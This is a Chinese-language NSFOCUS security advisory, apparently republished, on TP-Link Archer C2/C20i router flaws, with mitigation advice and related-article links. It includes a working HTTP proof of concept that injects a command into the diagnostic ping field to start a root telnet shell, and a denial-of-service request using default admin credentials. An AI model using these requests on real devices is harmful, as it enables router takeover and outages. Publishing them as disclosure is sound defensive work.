TP-Link C2和C20i产品出现命令注入、DoS等多个漏洞 绿盟科技发布安全威胁通告
TP-LINK Archer C2 和 TP-LINK Archer C20i都是该公司的路由器产品,近期这两款产品爆出多个严重漏洞,绿盟科技就此情况发布《TP-Link C2和C20i命令注入、拒绝服务等漏洞安全威胁通告》,通告全文如下:
日前,pierrekim.github.io网站发布了一个安全通告,公布了固件版本为“0.9.1 4.2 v0032.0 Build 160706 Rel.37961n”的TP-Link C2和C20i产品的多个漏洞。漏洞包括命令注入(需要身份认证)、拒绝服务以及不安全的默认配置。
命令注入漏洞
一个经过身份认证的攻击者,可以仅仅通过发送一个HTTP请求来进行命令注入,成功利用该漏洞,攻击者可以以root权限执行命令。该漏洞的一个POC如下:
POST /cgi?2 HTTP/1.1
Host: 192.168.1.1
Content-Type: text/plain
Referer: http://192.168.1.1/mainFrame.htm
Content-Length: 208
Cookie: Authorization=Basic YWRtaW46YWRtaW4=
Connection: close
[IPPING_DIAG#0,0,0,0,0,0#0,0,0,0,0,0]0,6
dataBlockSize=64
timeout=1
numberOfRepetitions=1
host=$(echo 127.0.0.1; /usr/sbin/telnetd -l bin/sh -p 25)
X_TP_ConnName=ewan_ipoe_d
diagnosticsState=Requested
当攻击者向具有漏洞设备的“Diagnostic”页面发送上述请求时,就可以得到一个远程shell:以root身份启动telnetd程序。
拒绝服务漏洞
一个经过身份认证的攻击者,可以通过向目标发送如下请求来导致设备崩溃:
GET /cgi/ansi HTTP/1.1
Host: 192.168.1.1
Content-Type: text/plain
Referer: http://192.168.1.1/mainFrame.htm
Content-Length: 208
Cookie: Authorization=Basic YWRtaW46YWRtaW4=
Connection: close
不安全的默认配置
另外,这两款产品还存在不安全的IP Tables默认配置。该默认规则由/lib/libcmm.so产生,并将相关规则写入文件/var/tmp/dconf/rc.router。其中一条规则如下:
iptables -A INPUT -p udp --dport 161 -j ACCEPT
该规则导致SNMP协议端口在每个网卡接口上都开放。
然而幸运的是,虽然SNMP的相关配置可以通过/main/snmp.html页面进行修改,但是snmpd程序已经从固件镜像中删除了。
相关链接如下:https://pierrekim.github.io/advisories/2017-tplink-0x00.txt
受影响的版本
使用“0.9.1 4.2 v0032.0 Build 160706 Rel.37961n”版本固件的TP-Link C2和C20i。
规避方案
TP-Link厂商表示将会在今年发布补丁,以修补上述漏洞。作为临时的缓解策略,用户可以禁用WAN口的管理功能。
绿盟科技声明
本安全公告仅用来描述可能存在的安全问题,绿盟科技不为此安全公告提供任何保证或承诺。由于传播、利用此安全公告所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,绿盟科技以及安全公告作者不为此承担任何责任。绿盟科技拥有对此安全公告的修改和解释权。如欲转载或传播此安全公告,必须保证此安全公告的完整性,包括版权声明等全部内容。未经绿盟科技允许,不得任意修改或者增减此安全公告内容,不得以任何方式将其用于商业目的。
原文发布时间:2017年3月24日
本文由:绿盟科技发布,版权归属于原作者
原文链接:http://toutiao.secjia.com/tp-link-c2-and-c20i-vulnerability
本文来自云栖社区合作伙伴安全加,了解相关信息可以关注安全加网站
TP-Link C2和C20i产品出现命令注入、DoS等多个漏洞 绿盟科技发布安全威胁通告相关推荐
- Ubiquiti几十款无线产品爆出命令注入漏洞 是因为没有升级老版本的PHP 据说厂商还未给出补丁...
Ubiquiti Networks公司提供的几十款产品中存在紧急漏洞,该漏洞可用于劫持设备.这个漏洞已于11月上报给了该厂商,但目前厂商尚未发布补丁修复大多数受影响的设备. 命令注入漏洞来自于没有升级 ...
- 命令注入_深入分析SaltStack Salt命令注入漏洞
一.概述 11月3日,SaltStack发布了Salt的安全补丁,修复了三个高危漏洞.其中有两个修复程序,是为了解决外部研究人员通过ZDI项目提交的五个漏洞.这些漏洞可导致在运行Salt应用程序的系统 ...
- DVWA通关攻略之命令注入
目录 1.Command Injection 命令注入 2.漏洞场景 3.实验演示 3.1.手工挖掘 3.2.使用burp爆破挖掘命令注入 4.命令注入防御 1.Command Injection 命 ...
- 小白 uBuntu20.04 2 安装TP Link TL-WDN5200 无线网卡驱动 亲测有效
小白 uBuntu20.04 2 安装TP Link TL-WDN5200 无线网卡驱动 首先我先说一下,其实网上很多都是有用的,只是安装步骤不是很详细罢了,我这个只做参考,希望能帮到你. 我朋友问我 ...
- TP Link WN726N ubuntu18安装成功
TP Link 的无线网卡确实在Ubuntu上不好使用, 这个大哥亲测了无数坑:https://blog.csdn.net/zhanghm1995/article/details/105334832 ...
- 【路由器】TP Link TL-WR702N 迷你路由器为何无法进入管理后台
TL-WR702N是TP Link在很多年前发布的一个迷你型的便携路由器,最近要搬家,我从箱子底翻出了这个小乖乖,年代有些久远,当初的账户密码全都忘到了九霄云外,无奈之下reset重新设置,但是却遇到 ...
- html link 怎么设置密码,TP-Link 无线路由器设置密码方法_设置tp link路由器的无线密码方法图解...
下面介绍TP-Link无线路由器如何设置无线接入密码,如果您的tp link无线路由器还没有设置好上网连接的话请参考 1.登录路由器的设置界面. 打开网页浏览器,在浏览器的地址栏中输入路由器的IP地址 ...
- 南大通用GBase 8d产品ldapsearch命令详解
南大通用GBase 8d产品ldapsearch命令详解 功能: 用于查询条目的客户端工具. 使用格式: ldapsearch [-x] [-D binddn] [-W] [-w bindpasswd ...
- python注入_python的常见命令注入威胁
ah!其实没有标题说的那么严重! 不过下面可是我们开发产品初期的一些血淋淋的案例,更多的安全威胁可以看看北北同学的<python hack>PPT,里面提及了不只命令执行的威胁,那些都是我 ...
- kylin源码调试_Apache Kylin 命令注入漏洞调试分析(CVE-2020-1956)
原标题:Apache Kylin 命令注入漏洞调试分析(CVE-2020-1956) 1.前言 Apache Kylin是一个开源的.分布式的分析型数据仓库,提供Hadoop/Spark 之上的 SQ ...
最新文章
- Bootstrap fileinput.js,最好用的文件上传组件
- Linux 网络编程——网络字节序(三)
- 圣诞素材ae模板-圣诞节日聚会派对视频素材ae模板
- GsonFormat插件
- 疫情之下的“催化剂”:在线经济崛起 房产数字化变革加速
- c语言交换两个变量的值 讲课,用C语言的泛型实现交换两个变量值
- tkinter label_tkinter版自制王者荣耀抽卡程序
- Log4Net使用手册 ---转载
- pandas不显示index_Pandas中文官档 ~ 基础用法1
- 全球DDOS安全防护
- python读取xps文件_Python操做PDF-文本和图片提取(使用PyPDF2和PyMuPDF)
- 车载前视摄像头学习笔记 ———— 环境影响
- java标准化考试系统源码_java标准化考试系统
- php云erp进销存v8手机端,PHP仿金蝶云ERP进销存V8网络多仓版源码
- C语言排序算法之“选择排序法”
- Appium工作日记:Message: An element could not be located on the page using the given search parameters.
- java教学视频毕向东_集合3--毕向东java基础教程视频学习笔记
- 下载kaggle比赛的数据集
- ZeroMemory、memset 和 “={0}” 三者区别
- Android_版本对应